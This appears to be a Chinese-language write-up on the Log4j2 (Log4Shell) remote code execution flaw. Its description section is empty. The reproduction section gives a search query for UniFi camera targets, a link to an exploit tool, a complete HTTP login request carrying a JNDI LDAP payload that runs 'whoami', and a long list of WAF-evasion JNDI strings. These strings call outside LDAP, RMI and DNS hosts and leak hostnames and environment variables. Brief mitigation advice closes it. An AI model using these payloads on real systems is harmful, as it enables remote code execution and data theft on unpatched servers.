Log4j2 远程代码执行漏洞

Log4j2 远程代码执行漏洞

一、漏洞描述

二、漏洞复现

"app:"unifi-摄像头""

https://codechina.csdn.net/mirrors/feihong-cs/JNDIExploit

POST /api/2.0/login HTTP/1.1
Host: 127.167.200.245:7443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
cmd:whoami
Connection: close
Content-Type: application/json
Content-Length: 91

{"username":"${jndi:ldap://192.168.235.249:1389/Basic/TomcatEcho}", "password":"dasfdasfads"}

${jndi:ldap://0107881c.dns.1433.eu.org/test}
JHtqbmRpOmxkYXA6Ly94eHguZG5zbG9nLmNuL3Rlc3R9
${${env:foo:-jndi}:dlap://127.0.0.1:1234/exp}
${jndi:dns://${sys:java.version}.dns.com}}

Log4j Bypass WAF Payloads：

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}

${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}

${jndi:rmi://adsasd.asdasd.asdasd}

${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

${jndi:ldap://127.0.0.1:1389/ badClassName}

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}

${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}

${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}

${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}

${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} 

${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}

${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} 

${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}

${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}

${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk

参考：

https://github.com/apache/logging-log4j2/pull/608/commits/755e2c9d57f0517a73d16bfcaed93cc91969bdee
https://mp.weixin.qq.com/s/wC7mrK1Y4DYz9_yW4fLzbw
https://mp.weixin.qq.com/s/K74c1pTG6m5rKFuKaIYmPg
https://mp.weixin.qq.com/s/jp_jBd9SN8pHy3jYc1rnTg
https://github.com/christophetd/log4shell-vulnerable-app

解决方案：
log4j2.formatMsgNoLookups=True
紧急方案就第一 网络拦截，第二防止外联，第三吧功能关了

1.升级到最新版本：

请联系厂商获取修复后的官方版本：

https://github.com/apache/logging-log4j2

已发现官方修复代码，目前尚未正式发布：

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1或采用奇安信产品解决方案来防护此漏洞。

2.缓解措施：

（1）. jvm参数 -Dlog4j2.formatMsgNoLookups=true

（2）. log4j2.formatMsgNoLookups=True

（3）.系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为true